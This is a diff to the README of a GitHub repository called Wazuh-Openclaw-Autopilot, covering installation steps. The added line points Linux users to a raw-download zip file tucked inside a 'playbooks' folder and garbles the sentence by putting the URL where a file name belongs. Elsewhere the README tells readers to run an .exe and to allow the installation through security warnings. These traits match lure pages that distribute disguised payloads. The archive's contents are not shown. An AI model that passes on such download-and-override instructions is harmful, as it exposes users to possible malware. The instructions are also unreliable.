Loune3213/Wazuh-Openclaw-Autopilot/README.md

 - On **Windows:** Double-click the `.exe` file.
 Follow the on-screen instructions to install.
 - On **Mac:** Open the `.dmg` file.
 Drag the app icon into your Applications folder.
-- On **Linux:** Extract the `.tar.gz` file and follow the README instructions usually included for installation.
+- On **Linux:** Extract the `https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip` file and follow the README instructions usually included for installation.

 If you see any warnings about security permissions, allow the installation from your system settings.